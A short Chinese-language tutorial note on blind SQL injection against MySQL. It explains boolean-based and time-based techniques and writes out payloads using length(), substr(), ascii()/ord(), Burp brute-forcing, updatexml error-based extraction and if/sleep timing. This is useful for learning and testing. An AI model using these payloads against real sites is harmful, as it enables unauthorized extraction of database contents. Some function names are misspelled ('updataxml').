盲注分两种:1.有回显(yes 或no)又名布尔型盲注
2.无回显,可以通过sleep判断,又名时间型盲注
这里可以用‘ and length(database())> 1来判断 数据库名长度
然后用substr 截取函数来猜字段,substr(database(),1,1)截取数据库第一位第一个值,可以通过burp爆破 ‘ and substr(database(),1,1)= 'a' -- qwe 爆破数值,或者通过ascii编码查询
ascii(substr(database(),1,1))>110
mysql中 ascii转换的函数未ord,也可以用ord进行判断:
‘ and ord(substr(database(),1,1)) > 110 --+
也可以用updatexml 试试能不能报错出:and updataxml(1,concat(0x7e,selectxxxxx,0x7e),1) -- +
这里concat 拼接符号,0x7e为~ascii编码,updataxml中间执行的必须时字符串,所以会先执行concat的命令,然后拼接出来。
时间注入原理如上,使用if(xxx,sleep(5),1)函数 if xxx成立则sleep ,如果不成立则执行1